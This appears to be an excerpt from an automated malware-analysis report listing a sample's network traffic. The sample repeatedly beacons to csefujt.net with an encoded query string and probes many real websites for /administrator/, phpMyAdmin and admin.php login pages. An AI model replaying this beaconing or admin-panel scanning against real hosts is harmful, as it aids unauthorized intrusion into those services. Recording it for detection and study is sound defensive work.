                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eei.uniandes.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.faceit.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pl-pl.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: chainmine.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ucivirtual.uci.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: v.xsanime.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: es-la.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ucivirtual.uci.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ucivirtual.uci.edu.mx/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: rage.mpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: cloud.simplify3d.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ag.ufa9999.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: naukrigulf.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: poligrafosecuador.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: account.mojang.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: secure.vexcorp.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: netizion.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pan.baidu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ag.ufa9999.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ag.ufa9999.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: sigapbanjarmasin.infoAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: naukrigulf.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://naukrigulf.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: casinocontroller.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kwyk.frAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nossoplayer.meAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=043e21066f59341f79d55d583419ce99User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://pt.secure.imvu.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: secure.vexcorp.comAccept: */*Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=81.181.57.74; _policy={"restricted_market":false,"tracking_market":"none"}; country=RO; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://secure.vexcorp.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: pan.baidu.comAccept: */*Accept-Encoding: deflate, gzipCookie: PANPSC=; BAIDUID=1B2A58FE47332A09C358E035BAC35AD0:FG=1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://pan.baidu.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: testconnect.garena.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nuevopacto.runacode.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.faceit.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: rage.mpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
